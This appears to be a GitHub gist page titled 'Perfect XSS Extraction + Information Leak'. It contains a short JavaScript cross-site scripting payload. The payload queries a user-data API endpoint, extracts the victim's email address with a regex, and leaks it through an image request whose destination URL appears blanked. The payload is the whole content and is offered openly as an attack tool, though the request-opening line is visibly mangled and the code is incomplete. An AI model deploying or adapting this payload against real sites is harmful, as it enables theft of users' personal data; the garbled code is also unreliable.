Skip to content

Instantly share code, notes, and snippets.

@adon90 adon90/leak.js
Created Oct 9, 2019

What would you like to do?
Perfect XSS Extraction + Information Leak
var req = new XMLHttpRequest();
req.onload = function () {
var patt2 = /OA_mail":\["([^"]*?)"/g;
var result = patt2.exec(req.responseText)[1];
new Image().src = (""+result);
};"GET", "/api/dataUsers/v1/WebStore/getUser", true);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.